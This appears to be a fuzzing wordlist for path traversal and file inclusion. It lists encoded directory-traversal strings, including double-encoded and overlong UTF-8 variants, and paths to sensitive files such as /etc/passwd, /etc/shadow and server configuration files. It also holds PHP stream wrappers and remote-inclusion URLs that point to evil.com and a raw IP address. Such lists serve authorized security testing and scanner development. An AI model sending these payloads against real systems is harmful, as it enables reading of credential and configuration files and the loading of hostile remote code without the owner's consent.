../
../../
%2e%2e%2f%2e%2e%2f
%2e%2e/%2e%2e/
..\..\
%2e%2e%5c%2e%2e%5c
%252e%252e%252f%252e%252e%252f
..%c0%af..%c0%af
..%c1%9c..%c1%9c
c:\windows\
.svn
/etc/passwd
/etc/httpd/conf/httpd.conf
/etc/sysconfig/network-scripts/ifcfg-eth0
/etc/my.cnf
/etc/redhat-release
/etc/shadow
/usr/local/webserver/nginx/conf/nginx.conf
/usr/local/nginx/conf/nginx.conf
/opt/nginx/conf/nginx.conf
/etc/nginx/nginx.conf
/usr/local/nginx/conf/proxy.conf
php://input
php://filter
http://evil.com/evil.js
ftp://evil.com/evil.js
https://evil.com/evil.js
http://220.190.11.16/evil.js